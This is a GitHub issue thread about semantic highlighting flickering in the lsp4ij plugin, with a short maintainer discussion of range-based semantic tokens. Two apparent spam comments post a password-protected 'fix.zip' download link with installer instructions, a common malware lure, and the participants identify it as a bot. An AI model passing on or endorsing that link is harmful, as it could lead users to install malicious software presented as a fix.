### ISSUE TITLE
Semantic highlighting often flickers while editing code.

### ISSUE THREAD

**Issue by CppCXY** [redhat-developer/lsp4ij#477]
![semantic](https://github.com/user-attachments/assets/cf64c34c-11fc-475e-83d1-ab009a6d4aad)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CppCXY** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Ad bot?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by angelozerr** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> Ad bot?

Yes.

**Comment by angelozerr** [comment]
Perhaps we need to improve semantic token by implementing semantic tokens range because today we re-highlight the full document.

**Comment by CppCXY** [comment]
Is it really useful to support range semanticToken? In fact, when typing code, vscode still sends semantic/full first. Actually, my entire file only has 2 lines of code. I feel it's a rendering issue.

**Comment by angelozerr** [comment]
To be honnest with you, I dont know. 

If you want to investigate the problem it will be very helpfull because I am very busy with some other issues like fixing strange  bugs and would like to study how to provide the best LSP API to customize lsp features like you need for completion with prefix
